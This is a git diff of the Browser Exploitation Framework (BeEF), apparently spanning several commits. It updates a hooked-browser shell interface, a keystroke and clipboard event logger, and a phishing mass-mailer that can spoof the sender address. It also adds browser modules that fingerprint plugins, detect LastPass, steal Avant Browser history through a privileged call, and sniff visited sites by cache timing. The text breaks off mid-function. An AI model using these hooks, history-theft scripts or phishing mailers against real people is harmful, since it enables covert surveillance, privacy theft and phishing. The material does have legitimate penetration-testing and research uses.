+        ['Hooked Page', 'Hook Host',     'HostName'],
         ['Hooked Page', 'Cookies',       'Cookies'],
 
         # Host
@@ -326,22 +329,22 @@ class ShellInterface
 
       case p[2]
         when "BrowserName"
-          data   = BeEF::Core::Constants::Browsers.friendly_name(BD.get(zombie_session, p[2]))
+          data   = BeEF::Core::Constants::Browsers.friendly_name(BD.get(self.targetsession.to_s, p[2])).to_s
 
         when "ScreenSize"
-          screen_size_hash = JSON.parse(BD.get(zombie_session, p[2]).gsub(/\"\=\>/, '":')) # tidy up the string for JSON
+          screen_size_hash = JSON.parse(BD.get(self.targetsession.to_s, p[2]).gsub(/\"\=\>/, '":')) # tidy up the string for JSON
           width  = screen_size_hash['width']
           height = screen_size_hash['height']
           cdepth = screen_size_hash['colordepth']
           data   = "Width: #{width}, Height: #{height}, Colour Depth: #{cdepth}"
 
         when "WindowSize"
-          window_size_hash = JSON.parse(BD.get(zombie_session, p[2]).gsub(/\"\=\>/, '":')) # tidy up the string for JSON
+          window_size_hash = JSON.parse(BD.get(self.targetsession.to_s, p[2]).gsub(/\"\=\>/, '":')) # tidy up the string for JSON
           width  = window_size_hash['width']
           height = window_size_hash['height']
           data   = "Width: #{width}, Height: #{height}"
         else
-          data   = BD.get(zombie_session, p[2])
+          data   = BD.get(self.targetsession, p[2])
       end
 
       # add property to summary hash

extensions/events/handler.rb

@@ -52,7 +52,7 @@ module Events
         when 'click'
           result = "#{event['time']}s - [Mouse Click] x: #{event['x']} y:#{event['y']} > #{event['target']}"
         when 'focus'
-          result = "#{event['time']}s - [Focus] Browser has regained focus."
+          result = "#{event['time']}s - [Focus] Browser window has regained focus."
         when 'copy'
           result = "#{event['time']}s - [User Copied Text] \"#{event['data']}\""
         when 'cut'
@@ -60,7 +60,7 @@ module Events
         when 'paste'
           result = "#{event['time']}s - [User Pasted Text] \"#{event['data']}\""
         when 'blur'
-          result = "#{event['time']}s - [Blur] Browser has lost focus."
+          result = "#{event['time']}s - [Blur] Browser window has lost focus."
         when 'keys'
           result = "#{event['time']}s - [User Typed] \"#{event['data']}\" > #{event['target']}"
         when 'submit'

extensions/social_engineering/config.yaml

@@ -21,7 +21,7 @@ beef:
                 use_auth: true
                 use_tls: true
                 helo: "gmail.com" # this is usually the domain name
-                from: "youruser@gmail.com"
+                auth: "youruser@gmail.com"
                 password: "yourpass"
                 # available templates
                 templates:

extensions/social_engineering/mass_mailer/mass_mailer.rb

@@ -20,14 +20,14 @@ module BeEF
           @host = @config.get("#{@config_prefix}.host")
           @port = @config.get("#{@config_prefix}.port")
           @helo = @config.get("#{@config_prefix}.helo")
-          @from = @config.get("#{@config_prefix}.from")
+          @auth = @config.get("#{@config_prefix}.auth")
           @password = @config.get("#{@config_prefix}.password")
         end
 
         # tos_hash is an Hash like:
         # 'antisnatchor@gmail.com' => 'Michele'
         # 'ciccio@pasticcio.com' => 'Ciccio'
-        def send_email(template, fromname, subject, link, linktext, tos_hash)
+        def send_email(template, fromname, fromaddr, subject, link, linktext, tos_hash)
           # create new SSL context and disable CA chain validation
           if @config.get("#{@config_prefix}.use_tls")
             @ctx = OpenSSL::SSL::SSLContext.new
@@ -37,7 +37,7 @@ module BeEF
 
           n = tos_hash.size
           x = 1
-          print_info "Sending #{n} mail(s) from [#{@from}] - name [#{fromname}] using template [#{template}]:"
+          print_info "Sending #{n} mail(s) from [#{fromaddr}] - name [#{fromname}] using template [#{template}]:"
           print_info "subject: #{subject}"
           print_info "link: #{link}"
           print_info "linktext: #{linktext}"
@@ -47,19 +47,19 @@ module BeEF
           smtp.enable_starttls(@ctx) unless @config.get("#{@config_prefix}.use_tls") == false
 
           if @config.get("#{@config_prefix}.use_auth")
-            smtp.start(@helo, @from, @password, :login) do |smtp|
+            smtp.start(@helo, @auth, @password, :login) do |smtp|
               tos_hash.each do |to, name|
-                message = compose_email(fromname, to, name, subject, link, linktext, template)
-                smtp.send_message(message, @from, to)
+                message = compose_email(fromname, fromaddr, to, name, subject, link, linktext, template)
+                smtp.send_message(message, fromaddr, to)
                 print_info "Mail #{x}/#{n} to [#{to}] sent."
                 x += 1
               end
             end
           else
-            smtp.start(@helo, @from) do |smtp|
+            smtp.start(@helo, @auth) do |smtp|
               tos_hash.each do |to, name|
-                message = compose_email(fromname, to, name, subject, link, linktext, template)
-                smtp.send_message(message, @from, to)
+                message = compose_email(fromname, fromaddr, to, name, subject, link, linktext, template)
+                smtp.send_message(message, fromaddr, to)
                 print_info "Mail #{x}/#{n} to [#{to}] sent."
                 x += 1
               end
@@ -67,33 +67,39 @@ module BeEF
           end
         end
 
-        def compose_email(fromname, to, name, subject, link, linktext, template)
-           msg_id = random_string(50)
-           boundary = "------------#{random_string(24)}"
-           rel_boundary = "------------#{random_string(24)}"
+        def compose_email(fromname, fromaddr, to, name, subject, link, linktext, template)
+          begin
+            msg_id = random_string(50)
+            boundary = "------------#{random_string(24)}"
+            rel_boundary = "------------#{random_string(24)}"
 
-           header = email_headers(@from, fromname, @user_agent, to, subject, msg_id, boundary)
-           plain_body = email_plain_body(parse_template(name, link, linktext, "#{@templates_dir}#{template}/mail.plain", template), boundary)
-           rel_header = email_related(rel_boundary)
-           html_body = email_html_body(parse_template(name, link, linktext, "#{@templates_dir}#{template}/mail.html", template),rel_boundary)
 
-           images = ""
-           @config.get("#{@config_prefix}.templates.#{template}.images").each do |image|
-             images += email_add_image(image, "#{@templates_dir}#{template}/#{image}",rel_boundary)
-           end
+            header = email_headers(fromaddr, fromname, @user_agent, to, subject, msg_id, boundary)
+            plain_body = email_plain_body(parse_template(name, link, linktext, "#{@templates_dir}#{template}/mail.plain", template), boundary)
+            rel_header = email_related(rel_boundary)
+            html_body = email_html_body(parse_template(name, link, linktext, "#{@templates_dir}#{template}/mail.html", template),rel_boundary)
 
-           attachments = ""
-           if @config.get("#{@config_prefix}.templates.#{template}.attachments") != nil
-             @config.get("#{@config_prefix}.templates.#{template}.attachments").each do |attachment|
-               attachments += email_add_attachment(attachment, "#{@templates_dir}#{template}/#{attachment}",rel_boundary)
-             end
-           end
+            images = ""
+            @config.get("#{@config_prefix}.templates.#{template}.images").each do |image|
+              images += email_add_image(image, "#{@templates_dir}#{template}/#{image}",rel_boundary)
+            end
 
-           close = email_close(boundary)
+            attachments = ""
+            if @config.get("#{@config_prefix}.templates.#{template}.attachments") != nil
+              @config.get("#{@config_prefix}.templates.#{template}.attachments").each do |attachment|
+                 attachments += email_add_attachment(attachment, "#{@templates_dir}#{template}/#{attachment}",rel_boundary)
+              end
+            end
 
-           message = header + plain_body + rel_header + html_body + images + attachments + close
-           print_debug "Raw Email content:\n #{message}"
-           message
+            close = email_close(boundary)
+          rescue Exception => e
+            print_error "Error constructing email."
+            raise
+          end
+
+          message = header + plain_body + rel_header + html_body + images + attachments + close
+          print_debug "Raw Email content:\n #{message}"
+          message
         end
 
         def email_headers(from, fromname, user_agent, to, subject, msg_id, boundary)

extensions/social_engineering/rest/socialengineering.rb

@@ -70,6 +70,7 @@ module BeEF
         #    "template": "default",
         #    "subject": "Hi from BeEF",
         #    "fromname": "BeEF",
+        #    "fromaddr": "beef@beef.com",
         #    "link": "http://www.microsoft.com/security/online-privacy/phishing-symptoms.aspx",
         #    "linktext": "http://beefproject.com",
         #    "recipients": [{
@@ -85,10 +86,11 @@ module BeEF
             template = body["template"]
             subject = body["subject"]
             fromname = body["fromname"]
+            fromaddr = body["fromaddr"]
             link = body["link"]
             linktext = body["linktext"]
 
-            if template.nil? || subject.nil? || fromname.nil? || link.nil? || linktext.nil?
+            if template.nil? || subject.nil? || fromaddr.nil? || fromname.nil? || link.nil? || linktext.nil?
               print_error "All parameters are mandatory."
               halt 401
             end
@@ -106,11 +108,16 @@ module BeEF
                 halt 401
               end
             end
-
-          mass_mailer = BeEF::Extension::SocialEngineering::MassMailer.instance
-          mass_mailer.send_email(template, fromname, subject, link, linktext, recipients)
           rescue Exception => e
-            print_error "Invalid JSON input passed to endpoint /api/seng/clone_page"
+            print_error "Invalid JSON input passed to endpoint /api/seng/send_emails"
+            error 400
+          end
+
+          begin
+            mass_mailer = BeEF::Extension::SocialEngineering::MassMailer.instance
+            mass_mailer.send_email(template, fromname, fromaddr, subject, link, linktext, recipients)
+          rescue Exception => e
+            print_error "Invalid mailer configuration"
             error 400
           end
         end

install-beef

@@ -5,6 +5,8 @@
 # See the file 'doc/COPYING' for copying permission
 #
 
+set -e
+
 clear
 echo "======================================"
 echo "          BeEF Installer   "
@@ -76,7 +78,7 @@ if [ "$Distro" == "Debian" ]; then
 
 sudo apt-get install build-essential openssl libreadline6 libreadline6-dev zlib1g zlib1g-dev libssl-dev libyaml-dev libsqlite3-0 libsqlite3-dev sqlite3 libxml2-dev libxslt1-dev autoconf libc6-dev libncurses5-dev automake libtool bison subversion
 
-bash < <(curl -sk https://raw.github.com/wayneeseguin/rvm/master/binscripts/rvm-installer)
+curl -sk https://raw.github.com/wayneeseguin/rvm/master/binscripts/rvm-installer | bash
 
 echo '[[ -s "$HOME/.rvm/scripts/rvm" ]] && . "$HOME/.rvm/scripts/rvm"' >> ~/.bashrc
 

liveCD/BeEFLive.sh

@@ -9,8 +9,8 @@
 #
 # This is the auto startup script for the BeEF Live CD. 
 # IT SHOULD ONLY BE RUN ON THE LIVE CD
-# Download LiveCD here: http://beefproject.com/BeEFLive1.2.iso
-# MD5 (BeEFLive1.2.iso) = 1bfba0942a3270ee977ceaeae5a6efd2
+# Download LiveCD here: http://downloads.beefproject.com/BeEFLive1.4.iso
+# MD5 (BeEFLive1.4.iso) = 5167450078ef5e9b8d146113cd4ba67c
 #
 # This script contains a few fixes to make BeEF play nicely with the way  
 # remastersys creates the live cd distributable as well as generating host keys 
@@ -117,6 +117,8 @@ show_menu() {
 		f1="/etc/ssh/ssh_host_rsa_key"
 		if [ -f $f1 ] ; then
 			echo "[1] Disable SSH                              [Currently Enabled]"
+			echo -ne "                                             beef@"
+			ifconfig | awk -F "[: ]+" '/inet addr:/ { if ($4 != "127.0.0.1") print $4 }'
 		else 
 			echo "[1] Enable SSH                               [Currently Disabled]"
 		fi
@@ -187,6 +189,8 @@ show_menu() {
 			 git stash
 			 git pull
 			 msf="0"
+			 # check for new bundle requirements and update
+		     bundle update
 		fi
 		
 		#

liveCD/isolinux.txt

@@ -0,0 +1,34 @@
+default vesamenu.c32
+prompt 0
+timeout 100
+
+menu title BeEF Live CD
+menu background splash.png
+menu color title 1;37;44 #c0ffffff #00000000 std
+
+label live
+  menu label live - BeEF Beef Live
+  kernel /casper/vmlinuz
+  append  file=/cdrom/preseed/custom.seed boot=casper initrd=/casper/initrd.gz quiet splash --
+
+label xforcevesa
+  menu label xforcevesa - boot Live in safe graphics mode
+  kernel /casper/vmlinuz
+  append  file=/cdrom/preseed/custom.seed boot=casper xforcevesa initrd=/casper/initrd.gz quiet splash --
+
+label install
+  menu label install - start the installer directly
+  kernel /casper/vmlinuz
+  append  file=/cdrom/preseed/custom.seed boot=casper only-ubiquity initrd=/casper/initrd.gz quiet splash --
+
+label memtest
+  menu label memtest - Run memtest
+  kernel /install/memtest
+  append -
+
+label hd
+  menu label hd - boot the first hard disk
+  localboot 0x80
+  append -
+
+

modules/browser/avant_steal_history/command.js

@@ -15,37 +15,33 @@
 //
 beef.execute(function() {
 
-	
+	if (!beef.browser.isA()) {
+		beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=Exploit failed. Target browser is not Avant Browser.");
+		return;
+	}
 
 	var avant_iframe = document.createElement("iframe");
 	//var avant_iframe = beef.dom.createInvisibleIframe();
-	avant_iframe.setAttribute('src', "browser:home");
-	avant_iframe.setAttribute('name','test2');
-	avant_iframe.setAttribute('width','0');
-	avant_iframe.setAttribute('heigth','0');
+	avant_iframe.setAttribute('src',      'browser:home');
+	avant_iframe.setAttribute('name',     'avant_history_<%= @command_id %>');
+	avant_iframe.setAttribute('width',    '0');
+	avant_iframe.setAttribute('heigth',   '0');
 	avant_iframe.setAttribute('scrolling','no');
+	avant_iframe.setAttribute('style',    'display:none');
 
 	document.body.appendChild(avant_iframe);
 
 	var vstr = {value: ""};
 
-	if(window['test2'].navigator) {
-	//This works if FF is the rendering engine
-	window['test2'].navigator.AFRunCommand(<%= @cId %>, vstr);
-	beef.net.send("<%= @command_url %>", <%= @command_id %>, vstr.value);
-
+	if (window['avant_history_<%= @command_id %>'].navigator) {
+		//This works if FF is the rendering engine
+		window['avant_history_<%= @command_id %>'].navigator.AFRunCommand(<%= @cId %>, vstr);
+		beef.net.send("<%= @command_url %>", <%= @command_id %>, "result="+vstr.value);
+	} else {
+		// this works if Chrome is the rendering engine
+		//window['avant_history_<%= @command_id %>'].AFRunCommand(60003, vstr);
+		beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=Exploit failed. Rendering engine is not set to Firefox.");
 	}
-	else {
-	// this works if Chrome is the rendering engine
-	//window['test2'].AFRunCommand(60003, vstr);
-	beef.net.send("<%= @command_url %>", <%= @command_id %>, "Exploit failed. Rendering engine is not set to Firefox");	
-
-	}
-	
-
-	
-
-	
 
 });
 

modules/browser/avant_steal_history/config.yaml

@@ -19,7 +19,7 @@ beef:
             enable: true
             category: "Browser"
             name: "Get Visited URLs (Avant Browser)"
-            description: "Invoke AFRunCommand() privileged function. The integer 60003 is passed by default to dump the Avant Browser history."
+            description: "This module attempts to retrieve a user's browser history by invoking the 'AFRunCommand()' privileged function.<br/><br/>Note: Avant Browser in Firefox engine mode only."
             authors: ["Roberto Suggi Liverani"]
             target:
-                working: ["ALL"]
+                working: ["FF"]

modules/browser/browser_fingerprinting/command.js

@@ -34,6 +34,10 @@ beef.execute(function() {
 		new Array("Firefox","4+","resource:///chrome/browser/skin/classic/browser/Geolocation-16.png"),
 		new Array("Firefox","7+","resource:///chrome/browser/content/browser/aboutHome-snippet1.png"),
 		new Array("Firefox","8+","resource:///chrome/browser/skin/classic/aero/browser/Toolbar-inverted.png"),
+		new Array("Firefox","9+","resource:///chrome/browser/skin/classic/aero/browser/identity.png"),
+		new Array("Firefox","10+","chrome://browser/skin/sync-128.png"),
+		new Array("Firefox","13+","chrome://browser/content/abouthome/noise.png"),
+		new Array("Firefox","18+","resource:///chrome/browser/skin/classic/aero/browser/webRTC-shareDevice-16.png"),
 		new Array("Internet Explorer","5-6","res://shdoclc.dll/pagerror.gif"),
 		new Array("Internet Explorer","7-9","res://ieframe.dll/ielogo.png"),
 		new Array("Internet Explorer","7+","res://ieframe.dll/info_48.png")

modules/browser/detect_foxit/command.js

@@ -0,0 +1,14 @@
+//
+// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
+//
+
+beef.execute(function() {
+
+	var result = ( beef.browser.hasFoxit() )? "Yes" : "No";
+
+	beef.net.send("<%= @command_url %>", <%= @command_id %>, "foxit="+result);
+
+});
+

modules/browser/detect_foxit/config.yaml

@@ -0,0 +1,15 @@
+#
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+beef:
+    module:
+        detect_foxit:
+            enable: true
+            category: "Browser"
+            name: "Detect Foxit Reader"
+            description: "This module will check if the browser has Foxit Reader Plugin."
+            authors: ["javuto"]
+            target:
+                working: ["All"]

modules/browser/detect_foxit/module.rb

@@ -0,0 +1,14 @@
+#
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+class Detect_foxit < BeEF::Core::Command
+
+	def post_execute
+		content = {}
+		content['foxit'] = @datastore['foxit']
+		save content
+	end
+
+end

modules/browser/detect_lastpass/command.js

@@ -0,0 +1,29 @@
+//
+// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
+//
+
+beef.execute(function() {
+	var result = "Not in use or not installed";
+
+	var lpdiv = document.getElementById('hiddenlpsubmitdiv');
+	if (typeof(lpdiv) != 'undefined' && lpdiv != null) {
+		//We've got the first detection of LP
+		result = "Detected LastPass through presence of the <script> tag with id=hiddenlpsubmitdiv";
+	} else if ($j("script:contains(lastpass_iter)").length > 0) {
+		//We've got the second detection of LP
+		result = "Detected LastPass through presense of the embedded <script> which includes references to lastpass_iter";
+	} else {
+
+		//Form is not there, lets check for any form elements in this page, because, LP won't activate at all without a <form>
+		if (document.getElementsByTagName("form").length == 0) {
+			//No forms
+			result = "The page doesn't seem to include any forms - we can't tell if LastPass is installed";
+		}
+		
+	}
+
+	beef.net.send("<%= @command_url %>", <%= @command_id %>, "lastpass="+result);
+});
+

modules/browser/detect_lastpass/config.yaml

@@ -0,0 +1,16 @@
+#
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+beef:
+    module:
+        detect_lastpass:
+            enable: true
+            category: "Browser"
+            name: "Detect LastPass"
+            description: "This module checks if the LastPass extension is installed and active."
+            authors: ["xntrik"]
+            target:
+                 not_working: ["IE"]
+                 working: ["All"]

modules/browser/detect_lastpass/module.rb

@@ -0,0 +1,14 @@
+#
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+class Detect_lastpass < BeEF::Core::Command
+
+	def post_execute 
+		content = {}
+		content['lastpass'] = @datastore['lastpass'] if not @datastore['lastpass'].nil?
+		save content
+	end
+
+end

modules/browser/detect_office/command.js

@@ -0,0 +1,44 @@
+//
+// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
+//
+
+beef.execute(function() {
+            var ma = 1;
+            var mb = 1;
+            var mc = 1;
+            var md = 1;
+            try {
+                ma = new ActiveXObject("SharePoint.OpenDocuments.4")
+            } catch (e) {}
+            try {
+                mb = new ActiveXObject("SharePoint.OpenDocuments.3")
+            } catch (e) {}
+            try {
+                mc = new ActiveXObject("SharePoint.OpenDocuments.2")
+            } catch (e) {}
+            try {
+                md = new ActiveXObject("SharePoint.OpenDocuments.1")
+            } catch (e) {}
+            var a = typeof ma;
+            var b = typeof mb;
+            var c = typeof mc;
+            var d = typeof md;
+            var key = "No Office Found";
+            if (a == "object" && b == "object" && c == "object" && d == "object") {
+                key = "Office 2010"
+            }
+            if (a == "number" && b == "object" && c == "object" && d == "object") {
+                key = "Office 2007"
+            }
+            if (a == "number" && b == "number" && c == "object" && d == "object") {
+                key = "Office 2003"
+            }
+            if (a == "number" && b == "number" && c == "number" && d == "object") {
+                key = "Office Xp"
+            }
+            beef.net.send("<%= @command_url %>", <%= @command_id %>, "office="+key);
+
+});
+

modules/browser/detect_office/config.yaml

@@ -0,0 +1,16 @@
+#
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+beef:
+    module:
+        detect_office:
+            enable: true
+            category: "Browser"
+            name: "Detect MS Office"
+            description: "This module detect the version of MS Office if installed"
+            authors: ["nbblrr"]
+            target:
+                working: ["IE"]
+                not_working: ["All"]

modules/browser/detect_office/module.rb

@@ -0,0 +1,14 @@
+#
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+class Detect_office < BeEF::Core::Command
+
+	def post_execute
+		content = {}
+		content['office'] = @datastore['office']
+		save content
+	end
+
+end

modules/browser/detect_wmp/command.js

@@ -0,0 +1,13 @@
+//
+// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
+//
+
+beef.execute(function() {
+
+	var result = ( beef.browser.hasWMP() )? "Yes" : "No";
+
+	beef.net.send("<%= @command_url %>", <%= @command_id %>, "wmp="+result);
+
+});

modules/browser/detect_wmp/config.yaml

@@ -0,0 +1,15 @@
+#
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+beef:
+    module:
+        detect_wmp:
+            enable: true
+            category: "Browser"
+            name: "Detect Windows Media Player"
+            description: "This module will check if the browser has the Windows Media Player plugin installed."
+            authors: ["gcattani"]
+            target:
+                working: ["All"]

modules/browser/detect_wmp/module.rb

@@ -0,0 +1,14 @@
+#
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+class Detect_wmp < BeEF::Core::Command
+
+	def post_execute
+		content = {}
+		content['wmp'] = @datastore['wmp']
+		save content
+	end
+
+end

modules/browser/get_visited_domains/command.js

@@ -16,6 +16,8 @@ var tries = 0;
 
 var isIE = 0;
 var isFF = 0;
+var isO = 0;
+var isC = 0;
 
 /*******************************
  * SUB-MS TIMER IMPLEMENTATION *
@@ -131,6 +133,56 @@ if (beef.browser.isIE() == 1) {
 	var MAX_ATTEMPTS = 1;	
 }
 
+if (beef.browser.isO() == 1){
+    /****************
+	 * SCANNED URLS *
+	 ****************/
+	var targets = [
+	  { 'category': 'Social networks' },
+	  { 'name': 'Facebook', 'urls': [ 'https://s-static.ak.facebook.com/rsrc.php/v1/yX/r/HN0ehA1zox_.js',
+									  'http://static.ak.facebook.com/rsrc.php/v1/yX/r/HN0ehA1zox_.js',
+									  'http://static.ak.fbcdn.net/rsrc.php/v1/yX/r/HN0ehA1zox_.js' ] },
+	  { 'name': 'Google Plus', 'urls': [ 'https://ssl.gstatic.com/gb/js/abc/gcm_57b1882492d4d0138a0a7ea7240394ca.js' ] },
+	
+	  { 'name': 'Dogster', 'urls': [ 'http://a1.cdnsters.com/static/resc/labjs1.2.0-jquery1.6-jqueryui1.8.12-bugfix4758.min.js.gz',
+									 'http://a1.cdnsters.com/static/resc/labjs1.2.0-jquery1.6-jqueryui1.8.12-bugfix4758.min.js' ] },
+	  { 'name': 'MySpace', 'urls': [ 'http://x.myspacecdn.com/modules/common/static/css/futuraglobal_kqj36l0b.css' ] },
+	  { 'category': 'Content platforms' },
+	  { 'name': 'Youtube', 'urls': [ 'http://s.ytimg.com/yt/cssbin/www-refresh-vflMpNCTQ.css' ] },
+	  { 'name': 'Hulu', 'urls': [ 'http://static.huluim.com/system/hulu_0cd8f497_1.css' ] },
+	  { 'name': 'Flickr', 'urls': [ 'http://l.yimg.com/g/css/c_fold_main.css.v109886.64777.105425.23' ] },
+	  { 'name': 'JustinBieberMusic.com', 'urls': [ 'http://www.justinbiebermusic.com/underthemistletoe/js/fancybox.js' ] },
+	  { 'name': 'Playboy', 'urls': [ 'http://www.playboy.com/wp-content/themes/pb_blog_r1-0-0/css/styles.css' /* 4h */ ] },
+	  { 'name': 'Wikileaks', 'urls': [ 'http://wikileaks.org/squelettes/jquery-1.6.4.min.js' ] },
+	  { 'category': 'Online media' },
+	  { 'name': 'New York Times', 'urls': [ 'http://js.nyt.com/js2/build/sitewide/sitewide.js' ] },
+	  { 'name': 'CNN', 'urls': [ 'http://z.cdn.turner.com/cnn/tmpl_asset/static/www_homepage/835/css/hplib-min.css',
+								 'http://z.cdn.turner.com/cnn/tmpl_asset/static/intl_homepage/564/css/intlhplib-min.css' ] },
+	  { 'name': 'Reddit', 'urls': [ 'http://www.redditstatic.com/reddit.en-us.xMviOWUyZqo.js' ] },
+	  { 'name': 'Slashdot', 'urls': [ 'http://a.fsdn.com/sd/classic.css?release_20111207.02' ] },
+	  { 'name': 'Fox News', 'urls': [ 'http://www.fncstatic.com/static/all/css/head.css?1' ] },
+	  { 'name': 'AboveTopSecret.com', 'urls': [ 'http://www.abovetopsecret.com/forum/ats-scripts.js' ] },
+	  { 'category': 'Commerce' },
+	  { 'name': 'Diapers.com', 'urls': [ 'http://c1.diapers.com/App_Themes/Style/style.css?ReleaseVersion=5.2.12',
+										 'http://c3.diapers.com/App_Themes/Style/style.css?ReleaseVersion=5.2.12' ] },
+	  { 'name': 'Expedia', 'urls': [ 'http://www.expedia.com/static/default/default/scripts/expedia/core/e.js?v=release-2011-11-r4.9.317875' ] },
+	  { 'name': 'Amazon (US)', 'urls': [ 'http://z-ecx.images-amazon.com/images/G/01/browser-scripts/us-site-wide-css-quirks/site-wide-3527593236.css._V162874846_.css' ] },
+	  { 'name': 'Newegg', 'urls': [ 'http://images10.newegg.com/WebResource/Themes/2005/CSS/template.v1.w.5723.0.css' ] },
+	  { 'name': 'eBay', 'urls': [ 'http://ir.ebaystatic.com/v4js/z/io/gbsozkl4ha54vasx4meo3qmtw.js' ] },
+      { 'category': 'Coding' },
+      { 'name': 'GitHub', 'urls': [ 'https://a248.e.akamai.net/assets.github.com/stylesheets/bundles/github-fa63b2501ea82170d5b3b1469e26c6fa6c3116dc.css' ] },
+      { 'category': 'Security' },
+      { 'name': 'Exploit DB', 'urls': [ 'http://www.exploit-db.com/wp-content/themes/exploit/style.css' ] },
+      { 'name': 'Packet Storm', 'urls': [ 'http://packetstormsecurity.org/img/pss.ico' ] },
+      { 'category': 'Email' },
+      { 'name': 'Hotmail', 'urls': [ 'https://secure.shared.live.com/~Live.SiteContent.ID/~16.2.9/~/~/~/~/css/R3WinLive1033.css' ] }
+	];
+	/*************************
+	 * CONFIGURABLE SETTINGS *
+	 *************************/
+	var TIME_LIMIT = 3;
+	var MAX_ATTEMPTS = 1;	
+}
 
 function sched_call(fn) {
   exec_next = fn;
@@ -160,7 +212,9 @@ function perform_check() {
   if (beef.browser.isFF() == 1) {
   	setTimeout(wait_for_read, 1);
   }
-  
+  if(beef.browser.isO() == 1){
+    setTimeout(wait_for_read, 1);
+  } 
 }
 
 
@@ -188,6 +242,18 @@ function wait_for_read() {
 		setTimeout(wait_for_read, 0);
 	  }	
    }
+   if (beef.browser.isO() == 1){
+      try{
+		
+        if(frames['f'].location.href != 'about:blank') throw 1;
+        
+        frames['f'].stop();
+        document.getElementById('f').src = 'javascript:"<body onload=\'parent.frame_ready = true\'>"';
+        setTimeout(wait_for_read2, 1);
+      } catch(e){
+        setTimeout(wait_for_read, 1);
+      }
+   }
 }
 
 function wait_for_read2() {
@@ -213,6 +279,9 @@ function navigate_to_target() {
   if (beef.browser.isIE() == 1) {
 	  setTimeout(wait_for_noread, 0);
   }
+  if (beef.browser.isO() == 1){
+      setTimeout(wait_for_noread, 1);
+  }
   urls++;
   document.getElementById("f").src = current_url;
 }
@@ -248,6 +317,17 @@ function wait_for_noread() {
     	}	
     	sched_call(wait_for_noread);    	
 	}
+    if (beef.browser.isO() == 1){
+       if (frames['f'].location.href == undefined){
+           confirm_visited = true;
+           throw 1;
+       }
+       if (cycles++ >= TIME_LIMIT) {
+           maybe_test_next();
+           return;
+       }
+        setTimeout(wait_for_noread, 1);
+     }
   } catch (e) {
     confirmed_visited = true;
     maybe_test_next();
@@ -262,6 +342,9 @@ function maybe_test_next() {
   if (beef.browser.isIE() == 1) {
   	   document.getElementById("f").src = 'about:blank';
   }
+  if (beef.browser.isO() == 1) {
+      document.getElementById('f').src = 'about:blank';
+  }
   if (target_off < targets.length) {
     if (targets[target_off].category) {
       //log_text(targets[target_off].category + ':', 'p', 'category');
@@ -312,7 +395,7 @@ function reload(){
 /* The handler for "run the test" button on the main page. Dispenses
    advice, resets state if necessary. */
 function start_stuff() {
-  if (beef.browser.isFF() == 1 || beef.browser.isIE() == 1 ) {
+  if (beef.browser.isFF() == 1 || beef.browser.isIE() == 1 || beef.browser.isO() == 1) {
   	  target_off = 0;
 	  attempt = 0;
 	  confirmed_visited = false;
@@ -321,15 +404,143 @@ function start_stuff() {
 	  maybe_test_next();
   }
   else {
-  	beef.net.send("<%= @command_url %>", <%= @command_id %>, 'results=This proof-of-concept is specific to Firefox and Internet Explorer, and probably won\'t work for you.');
+  	beef.net.send("<%= @command_url %>", <%= @command_id %>, 'results=This proof-of-concept is specific to Firefox, Internet Explorer, Chrome and Opera, and probably won\'t work for you.');
   }  
 }
 
+/**************/
+/***Visipisi***/
+/**************/
+var vp_result = {};
+
+var visipisi = {
+  webkit: function(url, cb) {
+    var start;
+    var loaded = false;
+    var runtest = function() {
+      window.removeEventListener("message", runtest, false);
+      var img = new Image();
+      start = new Date().getTime();
+      try{
+      img.src = url;
+      } catch(e) {}
+      var messageCB = function (e){
+      var now = new Date().getTime();
+          if (img.complete) {
+            delete img;
+            window.removeEventListener("message", messageCB, false);
+            cbWrap(true);
+          } else if (now - start > 10) {
+            delete img;
+	    if (window.stop !== undefined)
+		window.stop();
+            else
+		document.execCommand("Stop",false);
+            window.removeEventListener("message", messageCB, false);
+            cbWrap(false);
+        } else {
+          window.postMessage('','*');
+      	}
+
+    };
+    window.addEventListener("message", messageCB, false);
+    window.postMessage('','*');
+  };
+  cbWrap = function (value) {cb(value);};
+  window.addEventListener("message", runtest, false);
+  window.postMessage('','*');
+  }
+};
+
+function visipisiCB(vp, endCB, sites, urls, site, result){
+    if(result === null){
+	vp_result[site] = 'Whoops';
+     }
+     else{	
+	vp_result[site] = result ? 'visited' : 'not visited';
+     }
+     var next_site = sites.pop();
+     if(next_site)
+	vp( urls[next_site], function (result) { 
+	  visipisiCB(vp, endCB, sites, urls, next_site, result);
+	});
+      else
+	endCB();
+}
+
+function getVisitedDomains(){
+    var tests = {
